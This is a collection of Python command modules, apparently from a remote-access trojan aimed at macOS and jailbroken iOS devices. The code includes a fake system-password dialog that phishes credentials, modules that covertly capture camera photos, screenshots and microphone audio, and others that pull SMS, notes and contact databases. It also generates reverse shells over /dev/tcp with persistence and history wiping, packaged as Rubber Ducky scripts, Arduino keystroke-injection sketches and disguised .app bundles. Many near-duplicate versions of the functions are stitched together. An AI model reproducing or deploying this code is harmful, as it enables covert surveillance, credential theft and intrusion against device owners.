def run(self,session,cmd_data): payload = """ tell application "Finder" activate set myprompt to "Type your password to allow System Preferences to make changes" set ans to "Cancel" repeat try set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle" set ans to button returned of d_returns set mypass to text returned of d_returns if mypass > "" then exit repeat end try end repeat try do shell script "echo " & quoted form of mypass end try end tell """ cmd_data.update({"cmd":"applescript","args":payload}) password = session.send_command(cmd_data).strip() #display response h.info_success("Response: "+password.decode()) return ""
def run(self, session, cmd_data): if not cmd_data['args'] or (cmd_data['args'] != "front" and cmd_data['args'] != "back"): print self.usage return if cmd_data['args'] == "back": cmd_data['args'] = False else: cmd_data['args'] = True h.info_general("Taking picture...") try: response = json.loads(session.send_command(cmd_data)) if 'success' in response: size = int(response["size"]) if cmd_data['args'] == False: file_name = "back_{0}.jpg".format(int(time.time())) else: file_name = "front_{0}.jpg".format(int(time.time())) data = session.sock_receive_data(size) h.info_general("Saving {0}".format(file_name)) # save to file f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("Saved to downloads/{0}!".format(file_name)) else: if 'error' in response: h.info_error(response['error']) else: h.info_error("Unexpected error!") except Exception as e: print e
def run(self, session, cmd_data): if not cmd_data['args']: print self.usage return else: paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip()) if len(paths) > 2: print "Usage: upload <local_file> <remote_dir>" return local_dir = os.path.split(paths[0])[0] local_file = os.path.split(paths[0])[1] if len(paths) == 1: remote_dir = "." remote_file = local_file else: remote_dir = os.path.split(paths[1])[0] if not remote_dir: remote_dir = "." remote_file = os.path.split(paths[1])[1] if not remote_file: remote_file = local_file session.upload_file(paths[0], remote_dir, remote_file) h.info_success("File successfully uploaded!")
def run(self,server): while 1: shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ") while shell == "": shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ") persistence = raw_input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower() if persistence == "y": shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & " break else: shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;" break shell_command += "history -wc;killall Terminal" path = raw_input(h.info_general_raw("Output path: ")).strip(" ") if path == "": path = "payload.txt" if os.path.isdir(path): if os.path.exists(path): if path[-1:] == "/": payload_save_path = path + "payload.txt" else: payload_save_path = path + "/payload.txt" else: h.info_error("Local directory: "+path+": does not exist!") exit else: direct = os.path.split(path)[0] if direct == "": direct = "." else: pass if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path else: h.info_error("Error: "+direct+": not a directory!") exit else: h.info_error("Local directory: "+direct+": does not exist!") exit payload = """\ DELAY 500 COMMAND SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING """+shell_command+""" DELAY 500 ENTER DELAY 500""" h.info_general("Saving to " + payload_save_path + "...") f = open(payload_save_path,"w") f.write(payload) f.close() h.info_success("Saved to " + payload_save_path + "!")
def run(self, server): while 1: shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ") icon = raw_input( h.info_general_raw("Application Icon: ")).strip(" ") persistence = raw_input( h.info_question_raw("Make Persistent? (y/n): ")).strip( " ").lower() if persistence == "y": shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " break else: shell_command = shell + " &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" break path = raw_input(h.info_general_raw("Output File: ")).strip(" ") w = os.environ['OLDPWD'] os.chdir(w) if os.path.isdir(path): if os.path.exists(path): if path[:-1] == "/": payload_save_path = path + "payload.app" else: payload_save_path = path + "/payload.app" else: h.info_error("Local directory: " + path + ": does not exist!") exit else: direct = os.path.split(path)[0] if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path + "/Contents/MacOS/payload.sh" else: h.info_error("Error: " + direct + ": not a directory!") exit else: h.info_error("Local directory: " + direct + ": does not exist!") exit os.system("cp -r data/app/payload.app " + path + " > /dev/null") os.system("mv " + icon + " " + path + "/Contents/Resources/payload.icns > /dev/null") payload = """\ #! /usr/bin/env bash """ + shell_command h.info_general("Saving to " + path + "...") f = open(payload_save_path, "w") f.write(payload) f.close() h.info_success("Saved to " + path + "!") os.system("chmod +x " + path + "/Contents/MacOS/payload.sh") g = os.environ['HOME'] os.chdir(g + "/mouse")
def run(self, session, cmd_data): file_name = "sms.db" h.info_general("Downloading {0}".format(file_name)) data = session.download_file('/var/mobile/Library/SMS/' + file_name) if data: # save to downloads h.info_general("Saving {0}".format(file_name)) f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data): if not cmd_data['args']: print self.usage return file_name = os.path.split(cmd_data['args'])[-1] h.info_general("Downloading {0}...".format(file_name)) data = session.download_file(cmd_data['args']) if data: # save to downloads h.info_general("Saving {0}...".format(file_name)) f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("File saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data): h.info_general("Taking screenshot...") result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error(result['error']) return elif 'size' in result: size = int(result['size']) data = session.sock_receive_data(size) file_name = "screenshot_{0}.jpg".format(int(time.time())) h.info_general("Saving {0}".format(file_name)) # save to file f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data): h.info_general("Taking picture...") response = json.loads(session.send_command(cmd_data)) try: success = response["status"] if success == 1: size = int(response["size"]) file_name = "isight_{0}.jpg".format(int(time.time())) data = session.sock_receive_data(size) h.info_general("Saving {0}".format(file_name)) # save to file f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("Saved to downloads/{0}!".format(file_name)) except Exception as e: print e
def run(self,session,cmd_data): if len(cmd_data['args'].split()) < 2: print self.usage return w = os.environ['OLDPWD'] os.chdir(w) payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]] then echo 0 fi""" dchk = session.send_command({"cmd":"","args":payload}) chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]}) if chk[:4] != "stat": if dchk == "0\n": h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!") else: if os.path.isdir(cmd_data['args'].split()[1]): if os.path.exists(cmd_data['args'].split()[1]): rp = os.path.split(cmd_data['args'].split()[0])[1] data = session.download_file(cmd_data['args'].split()[0]) h.info_general("Downloading {0}...".format(rp)) if data: h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp)) f = open(os.path.join(cmd_data['args'].split()[1],rp),'w') f.write(data) f.close() if cmd_data['args'].split()[1][-1:] == "/": h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!") else: h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!") else: h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!") else: rp = os.path.split(cmd_data['args'].split()[1])[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): prr = os.path.split(cmd_data['args'].split()[1])[0] rp = os.path.split(cmd_data['args'].split()[1])[1] pr = os.path.split(cmd_data['args'].split()[0])[1] data = session.download_file(cmd_data['args'].split()[0]) h.info_general("Downloading {0}...".format(pr)) if data: h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1])) f = open(os.path.join(prr,rp),'w') f.write(data) f.close() h.info_success("Saved to "+cmd_data['args'].split()[1]+"!") else: h.info_error("Error: "+rp+": not a directory!") else: h.info_error("Local directory: "+rp+": does not exists!") else: h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!") g = os.environ['HOME'] os.chdir(g + "/mouse")
def run(self, session, cmd_data): # #print output if cmd_data["args"] == "stop": # expect json result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Error: " + result['error']) elif 'status' in result and result['status'] == 1: # download file data = session.download_file("/tmp/.avatmp") # save to file file_name = "mic{0}.caf".format(str(int(time.time()))) h.info_general("Saving {0}".format(file_name)) f = open(os.path.join('downloads', file_name), 'w') f.write(data) f.close() h.info_success("Saved to downloads/{0}!".format(file_name)) elif cmd_data["args"] == "start": h.info_general(session.send_command(cmd_data)) else: print "Usage: mic [start|stop]"
def run(self, session, cmd_data): if len(cmd_data['args'].split()) < 1: print(self.usage) return w = os.environ['OLDPWD'] os.chdir(w) dest = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Getting notes...") data = session.download_file( '/var/mobile/Library/Notes/notes.sqlite') if data: f = open(os.path.join(dest, 'notes.sqlite'), 'wb') f.write(data) f.close() if dest[-1] == "/": h.info_general("Saving to " + dest + "notes.sqlite...") time.sleep(1) h.info_success("Saved to " + dest + "notes.sqlite!") else: h.info_general("Saving to " + dest + "/notes.sqlite...") time.sleep(1) h.info_success("Saved to " + dest + "/notes.sqlite!") else: h.info_error("Failed to get notes!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Getting notes...") data = session.download_file( '/var/mobile/Library/Notes/notes.sqlite') if data: f = open(os.path.join(pr, rp), 'wb') f.write(data) f.close() h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Failed to get notes!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!") g = os.environ['HOME'] os.chdir(g + "/mouse")
def run(self, session, cmd_data): if len(cmd_data['args'].split()) < 1: print(self.usage) return dest = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Getting contacts...") data = session.download_file( '/var/mobile/Library/AddressBook/AddressBook.sqlitedb') if data: f = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb') f.write(data) f.close() if dest[-1] == "/": h.info_general("Saving to " + dest + "contacts.sqlitedb...") time.sleep(1) h.info_success("Saved to " + dest + "contacts.sqlitedb!") else: h.info_general("Saving to " + dest + "/contacts.sqlitedb...") time.sleep(1) h.info_success("Saved to " + dest + "/contacts.sqlitedb!") else: h.info_error("Failed to get contacts!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Getting contacts...") data = session.download_file( '/var/mobile/Library/AddressBook/AddressBook.sqlitedb') if data: f = open(os.path.join(pr, rp), 'wb') f.write(data) f.close() h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Failed to get contacts!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data): if len(cmd_data['args'].split()) < 1: print self.usage return dest = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Taking picture...") response = json.loads(session.send_command(cmd_data)) try: success = response["status"] if success == 1: size = int(response["size"]) data = session.sock_receive_data(size) f = open(os.path.join(dest, 'picture.jpg'), 'w') f.write(data) f.close() except: h.info_error("Failed to take picture!") return if dest[-1:] == "/": h.info_general("Saving to " + dest + "picture.jpg...") time.sleep(1) h.info_success("Saved to " + dest + "picture.jpg!") else: h.info_general("Saving to " + dest + "/picture.jpg...") time.sleep(1) h.info_success("Saved to " + dest + "/picture.jpg!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Taking picture...") response = json.loads(session.send_command(cmd_data)) try: success = response["status"] if success == 1: size = int(response["size"]) data = session.sock_receive_data(size) f = open(os.path.join(pr, rp), 'w') f.write(data) f.close() except: h.info_error("Failed to take picture!") return h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data): if len(cmd_data['args'].split()) < 1: print self.usage return dest = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Taking screenshot...") result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Failed to take screenshot!") return if 'size' in result: size = int(result['size']) data = session.sock_receive_data(size) f = open(os.path.join(dest, 'screenshot.jpg'), 'w') f.write(data) f.close() if dest[-1:] == "/": h.info_general("Saving to " + dest + "screenshot.jpg...") time.sleep(1) h.info_success("Saved to " + dest + "screenshot.jpg!") else: h.info_general("Saving to " + dest + "/screenshot.jpg...") time.sleep(1) h.info_success("Saved to " + dest + "/screenshot.jpg!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Taking screenshot...") result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Failed to take screenshot!") return if 'size' in result: size = int(result['size']) data = session.sock_receive_data(size) f = open(os.path.join(pr, rp), 'w') f.write(data) f.close() h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data): if len(cmd_data['args'].split()) < 1: print self.usage return dest = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Getting notes...") data = session.download_file( '/var/mobile/Library/Notes/notes.sqlite') if data: f = open(os.path.join(dest, 'notes.sqlite'), 'w') f.write(data) f.close() if dest[-1:] == "/": h.info_general("Saving to " + dest + "notes.sqlite...") time.sleep(1) h.info_success("Saved to " + dest + "notes.sqlite!") else: h.info_general("Saving to " + dest + "/notes.sqlite...") time.sleep(1) h.info_success("Saved to " + dest + "/notes.sqlite!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Getting notes...") data = session.download_file( '/var/mobile/Library/Notes/notes.sqlite') if data: f = open(os.path.join(pr, rp), 'w') f.write(data) f.close() h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data): if not cmd_data['args']: print(self.usage) return else: if cmd_data['args'].split()[0] == "start": pass else: if len(cmd_data['args'].split()) < 2 or cmd_data['args'].split( )[0] != "stop": print(self.usage) return if cmd_data['args'].split()[0] == "stop": w = os.environ['OLDPWD'] os.chdir(w) dest = cmd_data['args'].split()[1] cmd_data['args'] = "stop" if os.path.isdir(dest): if os.path.exists(dest): h.info_general("Stopping record...") result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Failed to record mic!") return elif 'status' in result and result['status'] == 1: data = session.download_file("/tmp/.avatmp") f = open(os.path.join(dest, 'mic.caf'), 'wb') f.write(data) f.close() if dest[-1] == "/": h.info_general("Saving to " + dest + "mic.caf...") time.sleep(1) h.info_success("Saved to " + dest + "mic.caf!") else: h.info_general("Saving to " + dest + "/mic.caf...") time.sleep(1) h.info_success("Saved to " + dest + "/mic.caf!") else: h.info_error("Local directory: " + dest + ": does not exist!") else: rp = os.path.split(dest)[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] h.info_general("Stopping record...") result = json.loads(session.send_command(cmd_data)) if 'error' in result: h.info_error("Failed to record mic!") return elif 'status' in result and result['status'] == 1: data = session.download_file("/tmp/.avatmp") f = open(os.path.join(pr, rp), 'wb') f.write(data) f.close() h.info_general("Saving to " + dest + "...") time.sleep(1) h.info_success("Saved to " + dest + "!") else: h.info_error("Error: " + rp + ": not a directory!") else: h.info_error("Local directory: " + rp + ": does not exist!") g = os.environ['HOME'] os.chdir(g + "/mouse") elif cmd_data['args'].split()[0] == "start": cmd_data['args'] = "record" h.info_general("Starting record...") session.send_command(cmd_data)
def run(self, server): while 1: shell = input(h.info_general_raw("Target shell: ")).strip(" ") while shell == "": shell = input(h.info_general_raw("Target shell: ")).strip(" ") icon = input( h.info_general_raw("Application icon: ")).strip(" ") while icon == "": icon = input( h.info_general_raw("Application icon: ")).strip(" ") persistence = input(h.info_question_raw( "Make persistent? (y/n): ")).strip(" ").lower() if persistence == "y": shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " break else: shell_command = shell + " &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" break shell_command += "history -wc;killall Terminal" path = input(h.info_general_raw("Output path: ")).strip(" ") if path == "": path = "payload.app" if os.path.isdir(path): if os.path.exists(path): if path[-1] == "/": payload_save_path = path + "payload.app" else: payload_save_path = path + "/payload.app" else: h.info_error("Local directory: " + path + ": does not exist!") exit else: direct = os.path.split(path)[0] if direct == "": direct = "." else: pass if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path else: h.info_error("Error: " + direct + ": not a directory!") exit else: h.info_error("Local directory: " + direct + ": does not exist!") exit h.info_general("Creating payload...") os.system("cp -r data/app/payload.app " + path + " > /dev/null") os.system("mv " + icon + " " + path + "/Contents/Resources/payload.icns > /dev/null") payload = """\ #! /usr/bin/env bash """ + shell_command h.info_general("Saving to " + path + "...") f = open(payload_save_path, "w") f.write(payload) f.close() h.info_success("Saved to " + path + "!") os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
def run(self,session,cmd_data): if len(cmd_data['args'].split()) < 2 or (cmd_data['args'].split()[0] != "front" and cmd_data['args'].split()[0] != "back"): print(self.usage) return dest = cmd_data['args'].split()[1] cmd_data['args'] = cmd_data['args'].split()[0] if os.path.isdir(dest): if os.path.exists(dest): if cmd_data['args'] == "back": cmd_data['args'] = False else: cmd_data['args'] = True h.info_general("Taking picture...") try: response = json.loads(session.send_command(cmd_data)) if 'success' in response: size = int(response["size"]) data = session.sock_receive_data(size) f = open(os.path.join(dest,'picture.jpg'),'wb') f.write(data) f.close() else: if 'error' in response: h.info_error("Failed to take picture!") return else: h.info_error("Failed to take picture!") return except: h.info_error("Failed to take picture!") return if dest[-1] == "/": h.info_general("Saving to "+dest+"picture.jpg...") time.sleep(1) h.info_success("Saved to "+dest+"picture.jpg!") else: h.info_general("Saving to "+dest+"/picture.jpg...") time.sleep(1) h.info_success("Saved to "+dest+"/picture.jpg!") else: h.info_error("Local directory: "+dest+": does not exist!") else: rp = os.path.split(dest)[0] if rp == "": rp = "." else: pass if os.path.exists(rp): if os.path.isdir(rp): pr = os.path.split(dest)[0] rp = os.path.split(dest)[1] if cmd_data['args'] == "back": cmd_data['args'] = False else: cmd_data['args'] = True h.info_general("Taking picture...") try: response = json.loads(session.send_command(cmd_data)) if 'success' in response: size = int(response["size"]) data = session.sock_receive_data(size) f = open(os.path.join(pr,rp),'wb') f.write(data) f.close() else: if 'error' in response: h.info_error("Failed to take picture!") return else: h.info_error("Failed to take picture!") return except: h.info_error("Failed to take picture!") return h.info_general("Saving to "+dest+"...") time.sleep(1) h.info_success("Saved to "+dest+"!") else: h.info_error("Error: "+rp+": not a directory!") else: h.info_error("Local directory: "+rp+": does not exist!")
def run(self, server): while 1: shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ") persistence = raw_input( h.info_question_raw("Make Persistent? (y/n): ")).strip( " ").lower() if persistence == "y": shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " break else: shell_command = shell + " &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" break shell_command += "history -wc;killall Terminal" path = raw_input(h.info_general_raw("Output File: ")).strip(" ") w = os.environ['OLDPWD'] os.chdir(w) if os.path.isdir(path): if os.path.exists(path): if path[:-1] == "/": payload_save_path = path + "payload.ino" else: payload_save_path = path + "/payload.ino" else: h.info_error("Local directory: " + path + ": does not exist!") exit else: direct = os.path.split(path)[0] if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path else: h.info_error("Error: " + direct + ": not a directory!") exit else: h.info_error("Local directory: " + direct + ": does not exist!") exit payload = """\ #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void setup() { Keyboard.begin(); delay(500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(' '); Keyboard.releaseAll(); delay(500); Keyboard.print(F("terminal")); delay(500); typeKey(KEY_RETURN); delay(500); Keyboard.print(F(\"""" + shell_command + """\")); delay(500); typeKey(KEY_RETURN); Keyboard.end(); } void loop() {}""" h.info_general("Saving to " + payload_save_path + "...") f = open(payload_save_path, "w") f.write(payload) f.close() h.info_success("Saved to " + payload_save_path + "!") g = os.environ['HOME'] os.chdir(g + "/mouse")
def run(self,server): while 1: shell = input(h.info_general_raw("Target shell: ")).strip(" ") if shell == "": shell = "sh" persistence = input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower() if persistence == "y": shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & " break else: shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;" break shell_command += "history -wc;killall Terminal" path = input(h.info_general_raw("Output path: ")).strip(" ") if path == "": path = "payload.txt" w = os.environ['OLDPWD'] os.chdir(w) if os.path.isdir(path): if os.path.exists(path): if path[-1] == "/": payload_save_path = path + "payload.txt" else: payload_save_path = path + "/payload.txt" else: h.info_error("Local directory: "+dest+": does not exist!") g = os.environ['HOME'] os.chdir(g + "/mouse") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return else: direct = os.path.split(path)[0] if direct == "": direct = "." else: pass if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path else: h.info_error("Error: "+direct+": not a directory!") g = os.environ['HOME'] os.chdir(g + "/mouse") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return else: h.info_error("Local directory: "+direct+": does not exist!") g = os.environ['HOME'] os.chdir(g + "/mouse") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return h.info_general("Creating payload...") payload = """\ DELAY 500 COMMAND SPACE DELAY 500 STRING terminal DELAY 500 ENTER DELAY 500 STRING """+shell_command+""" DELAY 500 ENTER DELAY 500""" h.info_general("Saving to " + payload_save_path + "...") f = open(payload_save_path,"w") f.write(payload) f.close() h.info_success("Saved to " + payload_save_path + "!") g = os.environ['HOME'] os.chdir(g + "/mouse")
def run(self, session, cmd_data): if not cmd_data['args']: print self.usage return else: paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip()) if len(paths) < 2: print "Usage: upload <local_path> <remote_path>" return if len(paths) > 2: print "Usage: upload <local_path> <remote_path>" return local_dir = os.path.split(paths[0])[0] local_file = os.path.split(paths[0])[1] remote_dir = os.path.split(paths[1])[0] remote_file = os.path.split(paths[1])[1] if os.path.exists(paths[0]): if os.path.isdir(paths[0]): h.info_error("Error: " + paths[0] + ": not a file!") return else: pass else: h.info_error("Local file: " + paths[0] + ": does not exist!") return raw = paths[1] payload = """if [[ -d """ + raw + """ ]] then echo 0 fi""" dchk = session.send_command({"cmd": "", "args": payload}) chk = session.send_command({"cmd": "stat", "args": raw}) if dchk == "0\n": if chk[:4] != "stat": h.info_general("Uploading " + local_file + "...") session.upload_file(paths[0], raw, local_file) if raw[-1:] == "/": h.info_general("Saving to " + raw + "" + local_file + "...") time.sleep(1) h.info_success("Saved to " + raw + "" + local_file + "...") else: h.info_general("Saving to " + raw + "/" + local_file + "...") time.sleep(1) h.info_success("Saved to " + raw + "/" + local_file + "...") else: h.info_error("Remote directory: " + raw + ": does not exist!") else: schk = session.send_command({ "cmd": "stat", "args": remote_dir }) if schk[:4] != "stat": h.info_general("Uploading " + local_file + "...") session.upload_file(paths[0], remote_dir, remote_file) h.info_general("Saving to " + raw + "...") time.sleep(1) h.info_success("Saved to " + raw + "...") else: h.info_error("Remote directory: " + remote_dir + ": does not exist!")
def run(self, server): while 1: shell = input(h.info_general_raw("Target shell: ")).strip(" ") if shell == "": shell = "sh" persistence = input(h.info_question_raw( "Make persistent? (y/n): ")).strip(" ").lower() if persistence == "y": shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str( server.host) + "/" + str( server.port) + " 0>&1); sleep 5; done & " break else: shell_command = shell + " &> /dev/tcp/" + str( server.host) + "/" + str(server.port) + " 0>&1;" break shell_command += "history -wc;killall Terminal" path = input(h.info_general_raw("Output path: ")).strip(" ") if path == "": path = "payload.ino" if os.path.isdir(path): if os.path.exists(path): if path[-1] == "/": payload_save_path = path + "payload.ino" else: payload_save_path = path + "/payload.ino" else: h.info_error("Local directory: " + path + ": does not exist!") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return else: direct = os.path.split(path)[0] if direct == "": direct = "." else: pass if os.path.exists(direct): if os.path.isdir(direct): payload_save_path = path else: h.info_error("Error: " + direct + ": not a directory!") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return else: h.info_error("Local directory: " + direct + ": does not exist!") input("Press enter to continue...").strip(" ") os.system("touch .nopayload") return h.info_general("Creating payload...") payload = """\ #include "Keyboard.h" void typeKey(uint8_t key) { Keyboard.press(key); delay(50); Keyboard.release(key); } void setup() { Keyboard.begin(); delay(500); Keyboard.press(KEY_LEFT_GUI); Keyboard.press(' '); Keyboard.releaseAll(); delay(500); Keyboard.print(F("terminal")); delay(500); typeKey(KEY_RETURN); delay(500); Keyboard.print(F(\"""" + shell_command + """\")); delay(500); typeKey(KEY_RETURN); Keyboard.end(); } void loop() {}""" h.info_general("Saving to " + payload_save_path + "...") f = open(payload_save_path, "w") f.write(payload) f.close() h.info_success("Saved to " + payload_save_path + "!")